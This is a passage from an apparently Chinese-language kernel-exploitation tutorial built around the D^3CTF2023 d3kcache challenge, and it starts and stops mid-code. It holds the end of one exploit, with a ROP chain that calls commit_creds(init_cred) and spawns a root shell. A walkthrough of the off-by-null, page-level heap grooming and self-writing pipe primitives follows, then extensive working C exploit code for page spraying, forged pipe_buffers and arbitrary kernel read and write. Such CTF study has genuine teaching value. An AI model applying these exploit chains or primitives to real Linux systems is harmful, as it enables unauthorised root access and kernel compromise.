    bind_core(true, false);

    wait_poll_start();

    puts("[*] Freeing corrupted key...");
    key_unlink(target_key);
    sleep(1); // give the kernel time to garbage-collect the key

    puts("[*] Overwriting poll_list next pointer...");
    char key[32] = {};
    /* NOTE(review): the value sprayed via setxattr is tty_struct address minus 0x18; the reason for 0x18 is not visible in this chunk. */
    *(size_t *) &buf[0] = target_object - 0x18;

    for (int i = 0; i < KEY_NUM; i++) {
        setxattr("/tmp/exp", "sky123", buf, 32, XATTR_CREATE);
        key_alloc(i, key, 32);
    }

    puts("[*] Freeing tty_struct structures...");
    for (int i = 0; i < TTY_NUM; i++) {
        close(tty_fd[i]);
    }

    sleep(1); // give the kernel time to release the TTYs
    int pipe_fd[PIPE_NUM][2];
    puts("[*] Spraying pipe_bufer structures...");
    for (int i = 0; i < PIPE_NUM; i++) {
        pipe(pipe_fd[i]);
        write(pipe_fd[i][1], "sky123", 6);
    }

    puts("[*] Triggering arbitrary free...");
    join_poll_threads(NULL, NULL);


    /*
     * Build the payload in buf. Viewed as a pipe_bufer, its ops pointer is
     * aimed at target_object + 0x300, and the release slot of the fake ops
     * table placed at buf + 0x300 holds the stack-pivot gadget.
     */
    ((struct pipe_bufer *) buf)->ops = (void *) (target_object + 0x300);
    ((struct pipe_buf_operations *) &buf[0x300])->release = (void *) push_rsi_pop_rsp_ret;


    /* The ROP chain starts at the very beginning of the same buffer. */
    size_t *rop = (size_t *) buf;

    /* First gadget pops two qwords, stepping over the next two slots (the second is the ops pointer set above). */
    *rop++ = pop_r14_pop_r15_ret;
    rop++;
    rop++; // ops

    // commit_creds(&init_creds)
    *rop++ = pop_rdi_ret;
    *rop++ = init_cred;
    *rop++ = commit_creds;

    // current = find_task_by_vpid(getpid())
    *rop++ = pop_rdi_ret;
    *rop++ = getpid();
    *rop++ = find_task_by_vpid;

    // current->fs = &init_fs (0x6e0 is presumably offsetof(task_struct, fs) on the target kernel)
    *rop++ = pop_rcx_ret;
    *rop++ = 0x6e0;
    *rop++ = add_rax_rcx_ret;
    *rop++ = pop_rbx_ret;
    *rop++ = init_fs;
    *rop++ = mov_mmrax_rbx_pop_rbx_ret;
    rop++; /* slot consumed by the trailing pop rbx */

    // back to user: swapgs, then an iretq frame (rip, cs, rflags, rsp, ss) built from save_status() values
    *rop++ = swapgs_ret;
    *rop++ = iretq;
    *rop++ = (uint64_t) get_shell;
    *rop++ = user_cs;
    *rop++ = user_rflags;
    *rop++ = user_sp;
    *rop++ = user_ss;

    puts("[*] Spraying ROP chain...");
    for (int i = 0; i < 31; i++) {
        key_alloc(i, buf, 1024);
    }

    puts("[*] Hijacking control flow...");
    /* Closing both ends of every pipe is the step expected to invoke the overwritten release pointer. */
    for (int i = 0; i < PIPE_NUM; i++) {
        close(pipe_fd[i][0]);
        close(pipe_fd[i][1]);
    }

    sleep(-1);

    return 0;
}

例题：D^3CTF2023 d3kcache

附件下载链接

题目驱动使用独立的 kmem_cache ，object 大小为 0x800。

kcache_jar = kmem_cache_create_usercopy("kcache_jar", 0x800LL, 0LL, 0x4042000LL, 0LL, 0x800LL, 0LL);

存在 off by null 漏洞。

if ( a2 == 0x514 )                        // write
{
  if ( (unsigned int)input.index <= 0xFuLL && ptr_list[input.index].ptr )
  {
    v7 = input.size;
    if ( input.size > 0x800u || (unsigned int)(input.size + cur_read_len[input.index].len) >= 0x800 )
      v7 = 2048 - cur_read_len[input.index].len;
    if ( v7 < 0 )
      BUG();
    v8 = &ptr_list[input.index].ptr[cur_read_len[input.index].len];
    v9 = (unsigned int)v7;
    v10 = input.buf;
    _check_object_size(v8, (unsigned int)v7, 0LL);
    if ( !copy_from_user(v8, v10, v9) )
    {
      v8[v9] = 0;
      v5 = 0LL;
    }
    goto LABEL_2;
  }
  ...
}

由于 kcache_jar 独立，因此只能考虑页级堆风水。通过调试发现 kcache_jar 的 oo = 196624 ，因此向 buddy system 请求的内存页的 order 为 196624 >> 16 = 3 。为了提高成功率，被溢出修改的结构所使用的 kmem_cache 的 order 也要为 3 。

这里我们使用 pipe_buffer 作为被修改的对象，为了使得其所使用的 kmem_cache 的 order 为 3 。我们需要调整 pipe 所使用的 pipe_buffer 数组的大小。这里我们使用的 kmem_cache 为 kmalloc-2k ，该 kmem_cache 的 oo 为 196624，对应的 order 为 3 。

pipe_fcntl 传入参数为 $n$ 时最终在 pipe_resize_ring 函数中 kcalloc 申请的内存大小为 $\left \lfloor\frac{2^{\left \lceil \log_2n \right \rceil }}{2^{12}}\right \rfloor \times \text{sizeof(struct pipe\_buffer)}$ ，因此我们只需要传入的参数为 0x1000*64 则会申请 $\left \lfloor\frac{2^{\left \lceil \log_2(\text{0x1000}\times 64) \right \rceil }}{2^{12}}\right \rfloor \times 40=\text{0xa00}$ 大小的内存，即可在 kmalloc-4k 中申请内存（实际调试发现 kmalloc-4k 的 kmem_cache 的 oo 为 196616 ，即 order 为 3，因此和 kmalloc-2k 效果一样，这里当然也可以传入例如 0x1000*32 在 kmalloc-2k 中申请内存。另外具体调试方法可以在 pipe_resize_ring 函数的 kmalloc 中下断点然后往里跟到 _kmem_cache_alloc_node 函数查看使用的 kmem_cache 。）。

通过溢出，我们修改了相邻内存页中的 pipe_buffer ，使其指向另一个 page 结构体。通过读取 pipe_buffer 中的内容我们可以获得 orig_pipe_id[0] 和 victim_pipe_id[0] 。

我们关闭 orig_pipe_id[0] 对应的 pipe，然后调用 pipe_fcntl 重新分配其余的 pipe 的 pipe_buffer 使得存在新的 pipe_buffer 位于 orig_pipe_id[0] 释放的 page 上。为了达到这个效果， pipe_fcntl 传入的参数为 0x1000*(96/sizeof(struct pipe_buffer)) ，这样会在 kmalloc-96 申请 pipe_buffer 内存，该 kmem_cache 的 oo 为 42，对应的 order 为 0 。

通过对 victim_pipe_id[0] 的读取和写入，我们实现了下图所示效果，同时也获取了一个 page 结构体的地址。

再一次采取上面的步骤，构造三个自写管道 evil_pipe_id[0] ，evil_pipe_id[1] 和 evil_pipe_id[2] 。

由于 3 个 pipe 都可以自写，因此可以利用三个 pipe 实现任意地址读写原语。

第一个管道用以进行内存空间中的任意读写，我们通过修改其 page 指针完成。
第二个管道用以修改第三个管道，使其写入的起始位置指向第一个管道。
第三个管道用以修改第一个与第二个管道，使得第一个管道的 page 指针指向指定位置、第二个管道的写入起始位置指向第三个管道。

我们目前实现的任意地址读写是根据 page 结构体地址读写该 page 对应内存页的数据。由于 page 数组和线性映射区之间是线性映射的关系，因此我们需要泄露 page_offset_base 和 vmemmap_base 来实现线性映射区地址和 page 结构体地址之间的转换。

page_offset_base + 0x9d000 地址处存放 secondary_startup_64 地址，由于前面读取 pipe_buffer 时通过 ops 泄露了内核基址，因此这个地址我们是知道的。我们可以将泄露的 page 地址与上 0xfffffffff0000000 的结果作为起始 vmemmap_base ，然后向低地址遍历（每次减去 0x10000000），检测 vmemmap_base + 0x9d000 / 0x1000 * sizeof(struct page) 地址处的 page 对应的内存页的起始位置是否存储了 secondary_startup_64 的地址，从而获取到 vmemmap_base 。

之后我们遍历 page 搜索当前进程的 task_struct ，在 task_struct 中有一个 ptraced 链表，在没有进程附加的时候是空链表指向自己，因此我们可以得到 task_struct 的地址，并且这个地址是线性映射区上的地址，进而我们可以得到 page_offset_base 。

至此我们实现了线性映射区的任意地址读写（权限允许的情况下）。

现在我们继续扩展利用范围，在线性映射区的任意地址读写的基础上实现真正的任意地址读写，这就需要我们在已知虚拟地址的基础上获取线性映射区中的地址。

由于前面我们已经泄露了 task_struct 的内容，因此我们可以泄露其中 mm_struct 类型的指针 mm 。从而在 mm_struct 中泄露 pgd 。

有了 pgd 之后我们可以进行页表解析获取任意一个虚拟地址对应的物理地址，也就知道了在线性映射区中的地址。

至此我们实现了真正意义上的任意地址读写。

有了任意地址读写后，提权方法就很多了，这里列举三种方法。

第一种方法是直接修改 task_struct 的 cred 指针指向 init_cred 或者写 task_struct 对应的 cred 。

第二种方法是向内核栈写 rop 提权。通过 task_struct 的 stack 指针我们可以获取到内核栈的地址。之后我们可以向内核中喷射 rop 实现提权。

第三种方法是向内核中的代码段写 shellcode 实现提权。不过由于内核代码段不可写，因此我们需要先 mmap 一块内存，然后修改这块内存对应的页表，将代码段的物理地址写入页表并设置为可读写权限。这里需要注意的是代码段是 2M 而不是 4K 的内存页，因此解析的是 3 级页表而不是 4 级页表。

至于 shellcode，提权代码不容易实现为 shellcode，但我们可以修改 ns_capable_setid 的返回值恒为 1 。在调用 setresuid(0, 0, 0) 提升权限的时候会通过 ns_capable_setid 判断是否允许，在修改 ns_capable_setid 函数后我们可以使用 setresuid(0, 0, 0) 提权。

#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <asm/ldt.h>
#include <assert.h>
#include <ctype.h>
#include <errno.h>
#include <fcntl.h>
#include <linux/keyctl.h>
#include <linux/userfaultfd.h>
#include <poll.h>
#include <pthread.h>
#include <sched.h>
#include <semaphore.h>
#include <signal.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/ipc.h>
#include <sys/mman.h>
#include <sys/msg.h>
#include <sys/prctl.h>
#include <sys/sem.h>
#include <sys/shm.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/xattr.h>
#include <unistd.h>
#include <sys/sysinfo.h>

/*
 * Return a pseudo-random integer in the half-open range [min, max).
 *
 * The value comes from rand(), so the sequence depends on the current
 * srand() seed. When the range is empty (max <= min) there is nothing to
 * choose from and `min` is returned; without this guard max == min would
 * evaluate rand() % 0, which is undefined behavior (SIGFPE on x86).
 */
int randint(int min, int max) {
    if (max <= min) {
        return min;
    }
    return min + (rand() % (max - min));
}

/*
 * Pin the caller to a single CPU.
 *
 * fixed  - true: use CPU 0; false: pick a random CPU in [1, get_nprocs()).
 * thread - true: set the affinity of the calling thread;
 *          false: set the affinity of the process (getpid()).
 *
 * On a machine with a single online CPU there is no "other" core, so CPU 0
 * is used regardless of `fixed`; this also avoids asking randint() for a
 * value from the empty range [1, 1). Failures of the affinity calls are
 * reported on stderr but are not fatal.
 */
void bind_core(bool fixed, bool thread) {
    cpu_set_t cpu_set;
    int nprocs = get_nprocs();
    int cpu = (fixed || nprocs <= 1) ? 0 : randint(1, nprocs);

    CPU_ZERO(&cpu_set);
    CPU_SET(cpu, &cpu_set);
    if (thread) {
        /* pthread_* functions return the error number instead of setting errno. */
        int rc = pthread_setaffinity_np(pthread_self(), sizeof(cpu_set), &cpu_set);
        if (rc != 0) {
            fprintf(stderr, "[x] pthread_setaffinity_np(cpu %d): %s\n", cpu, strerror(rc));
        }
    } else {
        if (sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set) < 0) {
            perror("[x] sched_setaffinity");
        }
    }
}

/*
 * Hex-dump `len` bytes at `addr` as 64-bit words, four words (32 bytes) per
 * row, followed by the printable-ASCII rendering of the same bytes.
 *
 * desc - optional heading printed first; may be NULL.
 * addr - start of the memory to dump.
 * len  - number of bytes; only whole qwords (len / 8) are shown in hex.
 */
void qword_dump(char *desc, void *addr, int len) {
    const uint64_t *qwords = (const uint64_t *) addr;
    const uint8_t *bytes = (const uint8_t *) addr;
    const int total_qwords = len / 8;

    if (desc != NULL) {
        printf("[*] %s:\n", desc);
    }

    for (int row = 0; row < total_qwords; row += 4) {
        const int row_offset = row * 8;

        /* Row label: byte offset of the first qword in this row. */
        printf("  %04x", row_offset);

        for (int col = 0; col < 4; col++) {
            if (row + col < total_qwords) {
                printf(" 0x%016lx", qwords[row + col]);
            } else {
                /* Blank filler as wide as one printed qword keeps the ASCII column aligned. */
                printf("                   ");
            }
        }

        printf("   ");

        for (int k = 0; k < 32 && row_offset + k < len; k++) {
            uint8_t ch = bytes[row_offset + k];
            printf("%c", isprint(ch) ? ch : '.');
        }
        puts("");
    }
}

/*
 * Hex-dump `len` bytes at `addr`, sixteen bytes per row, followed by the
 * printable-ASCII rendering of the same bytes.
 *
 * desc - optional heading printed first; may be NULL.
 * addr - start of the memory to dump.
 * len  - number of bytes to dump.
 */
void byte_dump(char *desc, void *addr, int len) {
    const uint8_t *bytes = (const unsigned char *) addr;

    if (desc != NULL) {
        printf("[*] %s:\n", desc);
    }

    for (int row_offset = 0; row_offset < len; row_offset += 16) {
        printf("  %04x", row_offset);

        for (int col = 0; col < 16; col++) {
            if (row_offset + col < len) {
                printf(" %02x", bytes[row_offset + col]);
            } else {
                /* Filler as wide as one printed byte keeps the ASCII column aligned. */
                printf("   ");
            }
        }

        printf("   ");

        for (int col = 0; col < 16 && row_offset + col < len; col++) {
            uint8_t ch = bytes[row_offset + col];
            printf("%c", isprint(ch) ? ch : '.');
        }
        puts("");
    }
}

/*
 * Report whether `addr` lies in the inclusive range
 * [0xFFFFFFFF80000000, 0xFFFFFFFFFEFFFFFF] that this file treats as
 * kernel text.
 */
bool is_kernel_text_addr(size_t addr) {
    const size_t lowest = 0xFFFFFFFF80000000;
    const size_t highest = 0xFFFFFFFFFEFFFFFF;

    if (addr < lowest) {
        return false;
    }
    return addr <= highest;
}

/*
 * Report whether `addr` lies in the inclusive range
 * [0xFFFF888000000000, 0xFFFFc87FFFFFFFFF] that this file treats as the
 * kernel direct-mapping area.
 */
bool is_dir_mapping_addr(size_t addr) {
    const size_t lowest = 0xFFFF888000000000;
    const size_t highest = 0xFFFFc87FFFFFFFFF;

    if (addr < lowest) {
        return false;
    }
    return addr <= highest;
}

/* User-mode register values captured by save_status(). */
size_t user_cs, user_rflags, user_sp, user_ss;

/*
 * Snapshot the current cs, ss, rsp and rflags into the globals above and
 * print a confirmation line.
 *
 * NOTE(review): the operands are written destination-first without '%'
 * prefixes, i.e. Intel syntax; the file presumably has to be built with
 * -masm=intel -- confirm against the build command.
 */
void save_status() {
    __asm__("mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pushf;"
            "pop user_rflags;");
    puts("[*] status has been saved.");
}

/* Write `text` to the file at `path`; failures are reported on stderr and otherwise ignored. */
static void write_proc_file(const char *path, const char *text) {
    int fd = open(path, O_WRONLY);

    if (fd < 0) {
        perror(path);
        return;
    }
    if (write(fd, text, strlen(text)) < 0) {
        perror(path);
    }
    close(fd);
}

/**
 * @brief create an isolated mount/user/network namespace and map the
 * caller's uid and gid to 0 inside it.
 *
 * Note that the caller **SHOULD NOT** be the process that is meant to get
 * root; it should only act as an operator that performs basic exploiting
 * operations inside the namespace.
 *
 * The uid and gid are sampled BEFORE unshare(): once the process is inside
 * a new user namespace without mappings, getuid()/getgid() return the
 * overflow id rather than the real one, and a map line built from that
 * value does not describe the caller.
 *
 * Errors are reported on stderr; if unshare() itself fails the function
 * returns without touching the /proc/self files.
 */
void unshare_setup(void) {
    char edit[0x100];
    const uid_t outer_uid = getuid();
    const gid_t outer_gid = getgid();

    if (unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET) < 0) {
        perror("[x] unshare");
        return;
    }

    /* setgroups must be denied before an unprivileged process may write gid_map. */
    write_proc_file("/proc/self/setgroups", "deny");

    snprintf(edit, sizeof(edit), "0 %u 1", (unsigned int) outer_uid);
    write_proc_file("/proc/self/uid_map", edit);

    snprintf(edit, sizeof(edit), "0 %u 1", (unsigned int) outer_gid);
    write_proc_file("/proc/self/gid_map", edit);
}
/**
 * III -  pgv pages sprayer related
 * note that we should create two processes:
 * - the parent is the one that sends commands and gets root
 * - the child creates an isolated namespace by calling unshare_setup(),
 *      receives commands from the parent and only executes them
 */
/* Size of the child's socket-descriptor table, i.e. the number of valid request indices. */
#define PGV_PAGE_NUM 1000
/* setsockopt() option names used with SOL_PACKET, defined locally. */
#define PACKET_VERSION 10
#define PACKET_TX_RING 13

/* Ring description passed to setsockopt(PACKET_TX_RING) by create_socket_and_alloc_pages(). */
struct tpacket_req {
    unsigned int tp_block_size; /* size of one block in bytes */
    unsigned int tp_block_nr;   /* number of blocks */
    unsigned int tp_frame_size; /* size of one frame in bytes */
    unsigned int tp_frame_nr;   /* total frames: block_size * block_nr / frame_size */
};

/*
 * Command record sent from the parent to the spray child over cmd_pipe_req.
 * Each allocation is (size * nr) bytes, aligned to PAGE_SIZE.
 */
struct pgv_page_request {
    int idx;           /* slot in the child's socket table */
    int cmd;           /* one of the CMD_* values */
    unsigned int size; /* block size in bytes (CMD_ALLOC_PAGE only) */
    unsigned int nr;   /* number of blocks (CMD_ALLOC_PAGE only) */
};

/* Operation types carried in pgv_page_request.cmd. */
enum {
    CMD_ALLOC_PAGE, /* create a packet socket and allocate its ring */
    CMD_FREE_PAGE,  /* close the socket stored at the given index */
    CMD_EXIT,       /* ends the child's command loop */
};

/* TPACKET version values for setsockopt(PACKET_VERSION); only TPACKET_V1 is used in this file. */
enum tpacket_versions {
    TPACKET_V1,
    TPACKET_V2,
    TPACKET_V3,
};

/*
 * Pipes for command communication with the spray child:
 * cmd_pipe_req carries requests parent -> child,
 * cmd_pipe_reply carries the int result child -> parent.
 */
int cmd_pipe_req[2], cmd_pipe_reply[2];

/* create a socket and alloc pages, return the socket fd */
int create_socket_and_alloc_pages(unsigned int size, unsigned int nr) {
    struct tpacket_req req;
    int socket_fd, version;
    int ret;

    socket_fd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);
    if (socket_fd < 0) {
        printf("[x] failed at socket(AF_PACKET, SOCK_RAW, PF_PACKET)\n");
        ret = socket_fd;
        goto err_out;
    }

    version = TPACKET_V1;
    ret = setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION,
                     &version, sizeof(version));
    if (ret < 0) {
        printf("[x] failed at setsockopt(PACKET_VERSION)\n");
        goto err_setsockopt;
    }

    memset(&req, 0, sizeof(req));
    req.tp_block_size = size;
    req.tp_block_nr = nr;
    req.tp_frame_size = 0x1000;
    req.tp_frame_nr = (req.tp_block_size * req.tp_block_nr) / req.tp_frame_size;

    ret = setsockopt(socket_fd, SOL_PACKET, PACKET_TX_RING, &req, sizeof(req));
    if (ret < 0) {
        printf("[x] failed at setsockopt(PACKET_TX_RING)\n");
        goto err_setsockopt;
    }

    return socket_fd;

    err_setsockopt:
    close(socket_fd);
    err_out:
    return ret;
}

/*
 * Called by the parent: ask the spray child to allocate `nr` blocks of
 * `size` bytes and remember the resulting socket at slot `idx`.
 *
 * Returns the child's reply (the socket descriptor in the child, or a
 * negative value on failure there). Returns -1 if the request could not be
 * sent or no complete reply was received, instead of returning an
 * uninitialized value.
 */
int alloc_page(int idx, unsigned int size, unsigned int nr) {
    struct pgv_page_request req = {
            .idx = idx,
            .cmd = CMD_ALLOC_PAGE,
            .size = size,
            .nr = nr,
    };
    int ret = -1;

    if (write(cmd_pipe_req[1], &req, sizeof(req)) != (ssize_t) sizeof(req)) {
        printf("[x] failed to send alloc request for idx %d\n", idx);
        return -1;
    }
    if (read(cmd_pipe_reply[0], &ret, sizeof(ret)) != (ssize_t) sizeof(ret)) {
        printf("[x] failed to read alloc reply for idx %d\n", idx);
        return -1;
    }

    return ret;
}

/*
 * Called by the parent: ask the spray child to close the socket stored at
 * slot `idx`, which releases the pages of its ring.
 *
 * Returns the child's reply (the result of close()). Returns -1 if the
 * request could not be sent or no complete reply was received, instead of
 * returning an uninitialized value. After a reply arrives the function
 * sleeps 10 ms before returning.
 */
int free_page(int idx) {
    struct pgv_page_request req = {
            .idx = idx,
            .cmd = CMD_FREE_PAGE,
    };
    int ret = -1;

    if (write(cmd_pipe_req[1], &req, sizeof(req)) != (ssize_t) sizeof(req)) {
        printf("[x] failed to send free request for idx %d\n", idx);
        return -1;
    }
    if (read(cmd_pipe_reply[0], &ret, sizeof(ret)) != (ssize_t) sizeof(ret)) {
        printf("[x] failed to read free reply for idx %d\n", idx);
        return -1;
    }
    usleep(10000);
    return ret;
}

/*
 * Runs in the child: enter an isolated namespace, then serve requests read
 * from cmd_pipe_req until CMD_EXIT arrives or the request pipe fails.
 *
 * Every request is answered with one int on cmd_pipe_reply:
 *   CMD_ALLOC_PAGE - result of create_socket_and_alloc_pages()
 *   CMD_FREE_PAGE  - result of close() on the stored socket
 *   CMD_EXIT       - 0
 *   anything else, or an out-of-range idx - -1
 * so the reply is never an uninitialized value.
 */
void spray_cmd_handler(void) {
    struct pgv_page_request req;
    int socket_fd[PGV_PAGE_NUM];
    int ret;

    /* Mark every slot empty so freeing a never-allocated index fails cleanly. */
    for (int i = 0; i < PGV_PAGE_NUM; i++) {
        socket_fd[i] = -1;
    }

    /* create an isolated namespace */
    unshare_setup();

    /* handle requests */
    for (;;) {
        ssize_t got = read(cmd_pipe_req[0], &req, sizeof(req));
        if (got < 0 && errno == EINTR) {
            continue;
        }
        if (got != (ssize_t) sizeof(req)) {
            printf("[x] failed to read request, stopping handler\n");
            break;
        }

        ret = -1;
        switch (req.cmd) {
        case CMD_ALLOC_PAGE:
        case CMD_FREE_PAGE:
            if (req.idx < 0 || req.idx >= PGV_PAGE_NUM) {
                printf("[x] invalid request index: %d\n", req.idx);
            } else if (req.cmd == CMD_ALLOC_PAGE) {
                ret = create_socket_and_alloc_pages(req.size, req.nr);
                socket_fd[req.idx] = ret;
            } else {
                ret = close(socket_fd[req.idx]);
                socket_fd[req.idx] = -1;
            }
            break;
        case CMD_EXIT:
            ret = 0;
            break;
        default:
            printf("[x] invalid request: %d\n", req.cmd);
            break;
        }

        if (write(cmd_pipe_reply[1], &ret, sizeof(ret)) != (ssize_t) sizeof(ret)) {
            printf("[x] failed to send reply, stopping handler\n");
            break;
        }
        if (req.cmd == CMD_EXIT) {
            break;
        }
    }
}

/*
 * Initialise the pgv page-spray subsystem: create the request/reply pipes
 * and fork the child that serves spray commands.
 *
 * The parent returns normally. The child never returns from this function:
 * once spray_cmd_handler() finishes it terminates with _exit(), so it cannot
 * fall through and start executing the parent's remaining code. Failure to
 * create the pipes or to fork is fatal, because every later alloc_page() /
 * free_page() call would otherwise block on a reply that never comes.
 */
void prepare_pgv_system(void) {
    /* pipes for pgv commands and replies */
    if (pipe(cmd_pipe_req) < 0 || pipe(cmd_pipe_reply) < 0) {
        perror("[x] failed to create pgv command pipes");
        exit(-1);
    }

    /* child process for pages spray */
    pid_t pid = fork();
    if (pid < 0) {
        perror("[x] failed to fork pgv spray child");
        exit(-1);
    }
    if (pid == 0) {
        spray_cmd_handler();
        /* _exit: do not flush stdio buffers inherited from the parent a second time. */
        _exit(0);
    }
}

/**
 * IV - config for page-level heap spray and heap fengshui
 */
/* Number of pipes created by self_write_pipe_init(). */
#define PIPE_SPRAY_NUM 200

/* Request indices [0, PGV_1PAGE_SPRAY_NUM) hold the 1-page allocations. */
#define PGV_1PAGE_SPRAY_NUM 0x20

/* The 4-page allocations follow directly after the 1-page ones. */
#define PGV_4PAGES_START_IDX PGV_1PAGE_SPRAY_NUM
#define PGV_4PAGES_SPRAY_NUM 0x40

/* The 8-page allocations follow directly after the 4-page ones. */
#define PGV_8PAGES_START_IDX (PGV_4PAGES_START_IDX + PGV_4PAGES_SPRAY_NUM)
#define PGV_8PAGES_SPRAY_NUM 0x40

/* Cursors into each index range; advanced as allocations are freed again. */
int pgv_1page_start_idx = 0;
int pgv_4pages_start_idx = PGV_4PAGES_START_IDX;
int pgv_8pages_start_idx = PGV_8PAGES_START_IDX;

/*
 * Spray page allocations of three sizes through the pgv child:
 * PGV_1PAGE_SPRAY_NUM single pages, PGV_4PAGES_SPRAY_NUM 4-page blocks and
 * PGV_8PAGES_SPRAY_NUM 8-page blocks. While spraying the 8-page blocks,
 * some earlier small allocations are freed again at fixed intervals.
 * A failed allocation is reported but does not stop the spray.
 */
void prepare_pgv_pages(void) {
    /**
     * We want cleaner, more contiguous memory here, which requires us to
     * reduce the noise when allocating order-3 pages.
     * So we pre-allocate pages for the noisy objects here.
     */
    puts("[*] spray pgv order-0 pages...");
    for (int i = 0; i < PGV_1PAGE_SPRAY_NUM; i++) {
        if (alloc_page(i, 0x1000, 1) < 0) {
            printf("[x] failed to create %d socket for pages spraying!\n", i);
        }
    }

    puts("[*] spray pgv order-2 pages...");
    for (int i = 0; i < PGV_4PAGES_SPRAY_NUM; i++) {
        if (alloc_page(PGV_4PAGES_START_IDX + i, 0x1000 * 4, 1) < 0) {
            printf("[x] failed to create %d socket for pages spraying!\n", i);
        }
    }

    /* spray 8 pages for page-level heap fengshui */
    puts("[*] spray pgv order-3 pages...");
    for (int i = 0; i < PGV_8PAGES_SPRAY_NUM; i++) {
        /* a socket needs 1 sock_inode_cache object; 19 objects per 4-page slab, so hand back one 4-page block every 19 sockets */
        if (i % 19 == 0) {
            free_page(pgv_4pages_start_idx++);
        }

        /* a socket needs 1 dentry; 21 objects per 1-page slab, so hand back one single page every 21 sockets */
        /* NOTE: `+= 2` advances the cursor before use, so only every second 1-page index is freed and index 0 never is. */
        if (i % 21 == 0) {
            free_page(pgv_1page_start_idx += 2);
        }

        /* a pgv needs 1 kmalloc-8 object; 512 objects per 1-page slab (with 0x40 iterations this fires only at i == 0) */
        if (i % 512 == 0) {
            free_page(pgv_1page_start_idx += 2);
        }

        if (alloc_page(PGV_8PAGES_START_IDX + i, 0x1000 * 8, 1) < 0) {
            printf("[x] failed to create %d socket for pages spraying!\n", i);
        }
    }

    puts("");
}


/* Descriptor of the challenge device; it is opened outside this chunk. */
int kcache_fd;

/* Argument block passed by pointer to every ioctl on kcache_fd. */
typedef struct {
    int index;     /* object slot */
    uint32_t size; /* byte count for the transfer */
    void *buf;     /* user buffer */
} kcache_cmd;


int kcache_alloc(int index, uint32_t size, void *buf) {
    return ioctl(kcache_fd, 0x114, &(kcache_cmd) {index, size, buf});
}

int kcache_write(int index, uint32_t size, void *buf) {
    return ioctl(kcache_fd, 0x514, &(kcache_cmd) {index, size, buf});
}

int kcache_read(int index, uint32_t size, void *buf) {
    return ioctl(kcache_fd, 0x1919, &(kcache_cmd) {index, size, buf});
}

int kcache_free(int index) {
    return ioctl(kcache_fd, 0x810, &(kcache_cmd) {.index=index});
}

/* Number of driver objects allocated, and the size used for the overflowing write (KCACHE_SIZE - 6 after a 6-byte fill). */
#define KCACHE_NUM 0x10
#define KCACHE_SIZE 2048

/* Byte sizes the pipe_buffer arrays are resized to in the second and third stage of self_write_pipe_init(). */
#define SND_PIPE_BUF_SZ 96
#define TRD_PIPE_BUF_SZ 192

/* Every sprayed pipe: [i][0] is the read end, [i][1] the write end. */
int pipe_fd[PIPE_SPRAY_NUM][2];

/*
 * Userspace mirror of the kernel's struct pipe_buffer (40 bytes here).
 * info_pipe_buf holds the copy leaked from the kernel; evil_pipe_buf[0..2]
 * are the forged copies written back for the three self-writing pipes.
 */
struct pipe_buffer {
    struct page *page;
    unsigned int offset, len;
    const struct pipe_buf_operations *ops;
    unsigned int flags;
    unsigned long private;
} info_pipe_buf, evil_pipe_buf[3];
/* Pipe indices discovered during setup; -1 means "not found yet". */
int orig_pipe_id[2] = {-1, -1};
int victim_pip_id[2] = {-1, -1};
int evil_pipe_id[3] = {-1, -1, -1};
/* Defaults; both are overwritten by self_write_pipe_init() once leaked. */
size_t page_offset_base = 0xffff888000000000;
size_t vmemmap_base = 0xffffea0000000000;
/* Difference between the leaked ops pointer and its expected unslid address. */
size_t kernel_offset;
/* Address of the current task_struct, set by self_write_pipe_init(). */
size_t current_task;
/* Scratch buffer of 0x1000 qwords shared by all read/write helpers. */
size_t buf[0x1000];

/*
 * Translate a direct-mapping address into the address of the struct page
 * describing its 4 KiB page: round down to the page boundary, turn the
 * distance from page_offset_base into a page index, and index vmemmap_base
 * with 0x40 bytes per entry.
 */
struct page *direct_map_addr_to_page_addr(size_t direct_map_addr) {
    size_t page_start = direct_map_addr & (~0xFFF);
    size_t page_index = (page_start - page_offset_base) / 0x1000;

    return (struct page *) (vmemmap_base + page_index * 0x40);
}

/*
 * Read up to 0xFFF bytes from the memory page described by the struct page
 * at `page_to_read` into `dst`, using the three self-writing pipes.
 *
 * The forged buffer for the first pipe is pointed at the target page, the
 * forged buffers are pushed into place through the second and third pipe,
 * and the data is then read out of the first pipe. The order of the four
 * writes must not change.
 *
 * Returns the result of the final read().
 */
ssize_t arbitrary_read_by_pipe(void *page_to_read, void *dst) {
    /* Forged pipe_buffer for the first pipe: target page, 0x1FF8 readable bytes from offset 0. */
    evil_pipe_buf[0].offset = 0;
    evil_pipe_buf[0].len = 0x1FF8;
    evil_pipe_buf[0].page = page_to_read;

    /* Second pipe rewrites the third pipe's buffer. */
    write(pipe_fd[evil_pipe_id[1]][1], &evil_pipe_buf[2], sizeof(info_pipe_buf));
    /* Third pipe rewrites the first pipe's buffer, pads up to the next slot, then rewrites the second pipe's buffer. */
    write(pipe_fd[evil_pipe_id[2]][1], &evil_pipe_buf[0], sizeof(info_pipe_buf));
    write(pipe_fd[evil_pipe_id[2]][1], buf, TRD_PIPE_BUF_SZ - sizeof(info_pipe_buf));
    write(pipe_fd[evil_pipe_id[2]][1], &evil_pipe_buf[1], sizeof(info_pipe_buf));
    return read(pipe_fd[evil_pipe_id[0]][0], dst, 0xFFF);
}

/*
 * Write `len` bytes from `src` to the start of the memory page described by
 * the struct page at `page_to_write`, using the three self-writing pipes.
 *
 * Mirrors arbitrary_read_by_pipe(), except that the forged buffer for the
 * first pipe has len 0 and the final step writes into the first pipe.
 * The order of the four setup writes must not change.
 *
 * Returns the result of the final write().
 */
ssize_t arbitrary_write_by_pipe(void *page_to_write, void *src, size_t len) {
    /* Forged pipe_buffer for the first pipe: target page, empty, offset 0. */
    evil_pipe_buf[0].offset = 0;
    evil_pipe_buf[0].len = 0;
    evil_pipe_buf[0].page = page_to_write;

    /* Second pipe rewrites the third pipe's buffer. */
    write(pipe_fd[evil_pipe_id[1]][1], &evil_pipe_buf[2], sizeof(info_pipe_buf));
